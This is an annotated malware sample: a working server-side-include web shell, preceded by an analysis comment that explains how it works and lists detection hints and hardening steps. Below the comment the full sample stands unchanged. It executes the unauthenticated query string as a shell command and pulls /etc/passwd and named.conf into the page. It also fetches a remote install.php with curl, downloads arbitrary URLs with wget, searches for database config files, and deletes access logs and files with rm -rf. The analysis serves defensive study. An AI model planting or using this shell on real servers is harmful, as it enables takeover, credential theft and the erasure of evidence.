<!--
  MALWARE SAMPLE (analysis annotation): a server-side-include (SSI) web shell.
  Everything after this comment is the sample itself, left unchanged.

  What the visible markup does:
  * The SSI directives at the top copy the raw request query string
    (QUERY_STRING_UNESCAPED) into the SSI variable "shl", falling back to
    "whoami" when the query string is empty. Further down, an "exec cmd"
    directive runs $shl and prints its output into a textarea. The query
    string is therefore executed as a shell command, and nothing in this
    file authenticates the requester.
  * The status box near the top of the body runs "id" and "uname" through
    "exec cmd" on every page load and echoes HTTP_HOST, SERVER_ADDR and
    DOCUMENT_ROOT.
  * The script functions only build such query strings client-side and
    navigate to DOCUMENT_NAME?command. Spaces are written as ${IFS} so the
    command contains no literal space; unknown45() appends "&&test".
  * Fixed actions wired to buttons: directory listing, rename/move/delete
    with rm -rf, du piped to grep for file search, finddb() searching
    DOCUMENT_ROOT for config.php / database.php / config.inc.php /
    koneksi.php, upfile() fetching a user-supplied URL with wget with
    certificate checking disabled, addupload() fetching a hard-coded remote
    install.php with curl and appending it to a local install.php,
    deletelog() running rm -rf against DOCUMENT_ROOT/../logs/, and delsel()
    removing the shell file itself.
  * Two hidden panels use "include virtual" with a long ../ chain to pull
    /etc/passwd and /etc/named.conf into the page. Whether that path
    resolves depends on the server and cannot be told from this file.

  Detection hints taken from this file:
  * Requests to an SSI-parsed document whose query string carries ${IFS}
    (literal, or percent-encoded as $%7BIFS%7D), shell operators, or the
    "&&test" suffix.
  * Files under the web root that contain an "exec cmd" directive fed from
    a variable, or "include virtual" with a ../ chain.
  * Page strings: title "SSI Webshell x", meta Author "Unknown45".
  * The web server process spawning curl, wget, rm, mv or du, and an
    unexpected install.php next to the sample.
  * deletelog() targets the local logs directory, so local access logs may
    be missing after use; rely on logs forwarded off-host.

  NOTE(review): on Apache httpd, Options IncludesNOEXEC (instead of
  Includes) disables the "exec" element; SSI parsing should not be enabled
  in locations where uploaded files can land. Confirm both against the
  documentation of the server actually in use.
-->
<!--#config errmsg="Not Supported Command"--><!--#set var="zero" value="" --><!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" --><!--#set var="shl" value="whoami" --><!--#else --><!--#set var="shl" value=$QUERY_STRING_UNESCAPED --><!--#endif -->SSI Webshell x<title>SSI Webshell x</title><meta name="theme-color" content="#000"><meta name="Author" content="Unknown45"><meta name="description" content="Security ? that just an illusion - "><meta property="og:description" content="Security ? that just an illusion - "><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/pace-js@latest/pace.min.js"></script><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/pace-js@latest/pace-theme-default.min.css"><script language="javascript">function unknown45(){ var uri = document.getElementById('command').value; var rep = uri.replace(/[ ]/g,'${IFS}'); var res = encodeURI(uri); document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+encodeURI(rep)+"&&test";}function refresh() { document.location.href="<!--#echo var=DOCUMENT_NAME -->";}function checkfile() { document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"ls${IFS}-la";} function readpass() { var selectedobj=document.getElementById('readpass'); if(selectedobj.className=='hide'){ //check if classname is hide selectedobj.style.display = "block"; selectedobj.readOnly=true; selectedobj.className ='show'; }else{ selectedobj.style.display = "none"; selectedobj.className ='hide'; }} function readnamed() { var selectedobj=document.getElementById('readnamed'); if(selectedobj.className=='hide'){ //check if classname is hide selectedobj.style.display = "block"; selectedobj.readOnly=true; selectedobj.className ='show'; }else{ selectedobj.style.display = "none"; selectedobj.className ='hide'; }} function movefiles() { var selectedobj=document.getElementById('movefiles'); if(selectedobj.className=='hide'){ //check if classname is hide 
selectedobj.style.display = "block"; selectedobj.readOnly=true; selectedobj.className ='show'; }else{ selectedobj.style.display = "none"; selectedobj.className ='hide'; }} function upfiles() { var selectedobj=document.getElementById('upfiles'); if(selectedobj.className=='hide'){ //check if classname is hide selectedobj.style.display = "block"; selectedobj.readOnly=true; selectedobj.className ='show'; }else{ selectedobj.style.display = "none"; selectedobj.className ='hide'; }} function renamefiles() { var selectedobj=document.getElementById('renamefiles'); if(selectedobj.className=='hide'){ //check if classname is hide selectedobj.style.display = "block"; selectedobj.readOnly=true; selectedobj.className ='show'; }else{ selectedobj.style.display = "none"; selectedobj.className ='hide'; }} function deletefiles() { var selectedobj=document.getElementById('deletefiles'); if(selectedobj.className=='hide'){ //check if classname is hide selectedobj.style.display = "block"; selectedobj.readOnly=true; selectedobj.className ='show'; }else{ selectedobj.style.display = "none"; selectedobj.className ='hide'; }} function findfiles() { var selectedobj=document.getElementById('findfiles'); if(selectedobj.className=='hide'){ //check if classname is hide selectedobj.style.display = "block"; selectedobj.readOnly=true; selectedobj.className ='show'; }else{ selectedobj.style.display = "none"; selectedobj.className ='hide'; }}function addupload(){ document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"curl${IFS}-Ls${IFS}raw.githubusercontent.com/admin-security/admin/main/install.php${IFS}|${IFS}tee${IFS}-a${IFS}install.php";}function checkroot() { var uri = "ls -la "; var rep = uri.replace(/[ ]/g,'${IFS}'); var res = encodeURI(uri); document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+encodeURI(rep)+"<!--#echo var=DOCUMENT_ROOT -->";}function deletelog() { var yakin = confirm("yakin hapus access logs nya ?"); if (yakin == true) { var uri = "rm -rf "; var rep = uri.replace(/[ 
]/g,'${IFS}'); var res = encodeURI(uri); document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+encodeURI(rep)+"<!--#echo var=DOCUMENT_ROOT -->/../logs/ *";} else { return true;}}function delsel() { var uri = "rm -rf "; var rep = uri.replace(/[ ]/g,'${IFS}'); var res = encodeURI(uri); document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+encodeURI(rep)+"<!--#echo var=DOCUMENT_NAME --> |${IFS}clear${IFS}&&${IFS}echo${IFS}Done";}function movesatu(){ document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"mv${IFS}"+document.getElementById('movefile').value+"${IFS}../"+document.getElementById('movefile').value+"${IFS}&&${IFS}realpath${IFS}../"+document.getElementById('movefile').value;}function movedua(){ document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"mv${IFS}"+document.getElementById('movefile').value+"${IFS}../../"+document.getElementById('movefile').value+"${IFS}&&${IFS}realpath${IFS}../../"+document.getElementById('movefile').value;}function movetiga(){ document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"mv${IFS}"+document.getElementById('movefile').value+"${IFS}../../../"+document.getElementById('movefile').value+"${IFS}&&${IFS}realpath${IFS}../../../"+document.getElementById('movefile').value;}function moveroot(){ document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"mv${IFS}"+document.getElementById('movefile').value+"${IFS}<!--#echo var=DOCUMENT_ROOT -->/"+document.getElementById('movefile').value+"${IFS}&&${IFS}realpath${IFS}<!--#echo var=DOCUMENT_ROOT -->/"+document.getElementById('movefile').value;}function upfile(){ var url = document.getElementById('linknya').value; var https = url.split("https://").join(""); var http = https.split("http://").join(""); document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"wget${IFS}"+encodeURI(http)+"${IFS}"+"--no-check-certificate${IFS}&&${IFS}ls${IFS}-la";}function renamefile(){ document.location.href="<!--#echo var=DOCUMENT_NAME 
-->?"+"mv${IFS}"+document.getElementById('renameawal').value+"${IFS}"+document.getElementById('renameakhir').value+"${IFS}&&${IFS}ls${IFS}-la";}function deletefile(){ document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"rm${IFS}-rf${IFS}"+document.getElementById('deletefile').value+"${IFS}&&${IFS}ls${IFS}-la";}function deleteinroot(){ var yakin = confirm("yakin hapus file ini di directory root ?"); if (yakin == true) { document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"rm${IFS}-rf${IFS}"+"<!--#echo var=DOCUMENT_ROOT -->/"+document.getElementById('deletefile').value+"${IFS}&&${IFS}ls${IFS}-la${IFS}<!--#echo var=DOCUMENT_ROOT -->";} else { return true;}}function deletefiledua(){ document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"rm${IFS}-rf${IFS}"+document.getElementById('deletedir').value+"/"+document.getElementById('deletefiledua').value+"${IFS}&&${IFS}ls${IFS}-la${IFS}"+document.getElementById('deletedir').value;}function findfile(){ document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"du${IFS}-ah${IFS}"+"|${IFS}grep${IFS}"+document.getElementById('findfile').value;}function findinroot(){ document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"du${IFS}-ah${IFS}"+"<!--#echo var=DOCUMENT_ROOT -->${IFS}"+"|${IFS}grep${IFS}"+document.getElementById('findfile').value;}function findfiledua(){ document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"du${IFS}-ah${IFS}"+document.getElementById('finddir').value+"${IFS}|${IFS}grep${IFS}"+document.getElementById('findfiledua').value;}function finddb(){ document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"du${IFS}-ah${IFS}"+"<!--#echo var=DOCUMENT_ROOT -->${IFS}"+"|${IFS}grep${IFS}-e${IFS}config.php${IFS}-e${IFS}database.php${IFS}-e${IFS}config.inc.php${IFS}-e${IFS}koneksi.php";}</script><style type="text/css">@import url('https://fonts.googleapis.com/css2?family=Kelly+Slab&display=swap');.input {background: transparent;border-width: thin;cursor: pointer;border: 1.5px solid 
deeppink;}button {cursor: pointer;border: 1.5px solid deeppink;border-radius: 5px;font-size: 1rem;color: white;background-color: transparent;margin-bottom: 0.3rem;font-family: 'Kelly Slab';}button:hover {color: lime;border: 1.5px solid white;}</style><body onload="checkaja()" style="color: black;font-size: 0px;background: black;font-family: 'Kelly Slab';"> <div style="text-align: center;font-size: 2rem;color: white;"> <font>SSI WEBSHELL</font> </div> <div style="text-align: center;color: white;font-size: 1rem;"> <font>Command : </font> <input type=text size=60 id=command class="text" name="address1" style=" background-color: transparent;color: white;font-size: 1rem;border: 1.5px solid deeppink;border-radius: 5px;">&nbsp; <button class="input" id="gas" onclick="unknown45();"> <span>Execute</span> </button> </div> <div style="border: 1.5px solid deeppink;border-radius: 5px;padding: 0.5rem;color: white;font-size: 1rem;"> <font style="color: white;">Host : </font><font style="color: lime;"> <!--#echo var=HTTP_HOST --> </font><br /> <font style="color: white;">Server Address : </font><font style="color: lime;"> <!--#echo var=SERVER_ADDR --> </font><br /> <font style="color: white;">User : </font><font style="color: lime;"> <!--#exec cmd="id" --> </font><br /> <font style="color: white;">System : </font><font style="color: lime;"> <!--#exec cmd="{uname,-nrv}" --> </font><br /> <font style="color: white;">Current Path : </font><font style="color: lime;"> <!--#echo var=DOCUMENT_ROOT --><!--#echo var=SCRIPT_NAME --> </font><br /> </div> <div style="padding-top:5px; padding-buttom:5x;color: white;font-size: 1rem;text-align: center;"> <button onclick="refresh()">Refresh</button> <button onclick="checkfile()">List File</button> <button onclick="renamefiles()">Rename File</button> <button onclick="movefiles()">Move File</button> <button onclick="deletefiles()">Delete File</button> <button onclick="findfiles()">Find File</button> <button onclick="upfiles()">Upload File</button> 
<button onclick="delsel()">Remove Shell</button> </div> <div style="padding-top:5px; padding-buttom:5x;color: white;font-size: 1rem;text-align: center;"> <button onclick="readpass();">Read /etc/passwd</button> <button onclick="readnamed();">Read /etc/named.conf</button> <button onclick="addupload()">Upload Shell</button> <button onclick="checkroot()">Check Root Directory</button> <button onclick="deletelog()">Delete Access Logs</button> </div> <div style="border: 1.5px solid deeppink;border-radius: 5px;padding: 0.5rem;color: white;font-size: 1rem;"> <font style="color: white;font-size: 1rem;">Executed Command : </font> <font id="cmd" style="color: white;font-size: 1rem;"><!--#echo var=shl --></font><br /> <textarea bgcolor=#e4e0d8 cols=121 rows=15 style="resize: none;font-family: 'Kelly Slab';background-color: transparent;width:99%;border: 1.5px solid lime;border-radius: 5px;padding: 0.5rem;color: white;font-size: 1rem;margin: 0.3rem;"><!--#exec cmd=$shl --></textarea><script> var cmd = document.getElementById("cmd").innerHTML.split("${IFS}").join(" "); document.getElementById("cmd").innerHTML = cmd; var gaskan = document.getElementById("command"); gaskan.addEventListener("keyup", function(event) { if (event.keyCode === 13) { event.preventDefault(); document.getElementById("gas").click(); }});</script><font id="readpass" style="display:none;color: white;font-size: 1rem;">
<!-- Hidden panel: the textarea below is filled server-side by an "include virtual" directive that points at /etc/passwd through a ../ chain. -->
Read : /etc/passwd
<textarea bgcolor="#e4e0d8" cols="121" rows="15" style="color: white;resize: none; outline: none;border: 1.5px solid lime;background-color: transparent;font-size: 1rem;border-radius: 5px;"><!--#include virtual="/../../../../../../../../../../../../../../etc/passwd" --></textarea></font><font id="readnamed" style="display:none;color: white;font-size: 1rem;">
<!-- Hidden panel: same technique as the previous panel, aimed at /etc/named.conf. -->
Read : /etc/named.conf
<textarea bgcolor=#e4e0d8 cols="121" rows="15" style="color: white;resize: none; outline: none;border: 1.5px solid lime;background-color: transparent;font-size: 1rem;border-radius: 5px;"><!--#include virtual="/../../../../../../../../../../../../../../etc/named.conf" --></textarea></font><font id="movefiles" style="display:none;color: white;font-size: 1rem;">
<!-- From here on the hidden panels only collect file names, directories and a URL; the script functions earlier in the file concatenate those values, unvalidated, into the shell command placed in the query string. -->
Move File to previous directory

filename : <textarea bgcolor="#e4e0d8" cols="25" rows="1" id="movefile" style="color: white;resize: none; outline: none;border: 1.5px solid lime;background-color: transparent;font-size: 1rem;border-radius: 5px;" required></textarea> <button onclick="movesatu()">1 directory</button> <button onclick="movedua()">2 directory</button> <button onclick="movetiga()">3 directory</button> <button onclick="moveroot()">root directory</button></font><font id="renamefiles" style="display:none;color: white;font-size: 1rem;">
Rename File

<textarea bgcolor="#e4e0d8" cols="25" rows="1" id="renameawal" style="resize: none; outline: none" required></textarea> to <textarea bgcolor="#e4e0d8" cols="25" rows="1" id="renameakhir" style="resize: none; outline: none" required></textarea>
<button onclick="renamefile()">Gaskan</button></font><font id="upfiles" style="display:none;color: white;font-size: 1rem;">
Upload File

Link : <textarea bgcolor="#e4e0d8" cols="100" rows="1" id="linknya" style="color: white;resize: none; outline: none;border: 1.5px solid lime;background-color: transparent;font-size: 1rem;border-radius: 5px;" required></textarea> <button onclick="upfile()">Gaskan</button></font><font face="courier" size="2" id="deletefiles" style="display:none;color: white;font-size: 1rem;">
Delete File
<textarea bgcolor="#e4e0d8" cols="25" rows="1" id="deletefile" style="color: white;resize: none; outline: none;border: 1.5px solid lime;background-color: transparent;font-size: 1rem;border-radius: 5px;" required></textarea> <button onclick="deletefile()">Delete</button> <button onclick="deleteinroot()">Delete this in root directory</button>

delete file in custom directories
<textarea bgcolor="#e4e0d8" cols="25" rows="1" id="deletefiledua" style="resize: none; outline: none" required></textarea> in directory <textarea bgcolor="#e4e0d8" cols="25" rows="1" id="deletedir" style="resize: none; outline: none" required></textarea> <button onclick="deletefiledua()">Delete</button></font><font id="findfiles" style="display:none;color: white;font-size: 1rem;">
Find Files
<textarea bgcolor="#e4e0d8" cols="25" rows="1" id="findfile" style="color: white;resize: none; outline: none;border: 1.5px solid lime;background-color: transparent;font-size: 1rem;border-radius: 5px;" required></textarea> <button onclick="findfile()">Find</button> <button onclick="finddb()">find database location (beta)</button> <button onclick="findinroot()">Find this in root directory</button>

find files in custom directories
<textarea bgcolor="#e4e0d8" cols="25" rows="1" id="findfiledua" style="resize: none; outline: none" required></textarea> in directory <textarea bgcolor="#e4e0d8" cols="25" rows="1" id="finddir" style="resize: none; outline: none" required></textarea> <button onclick="findfiledua()">Find</button></font></div>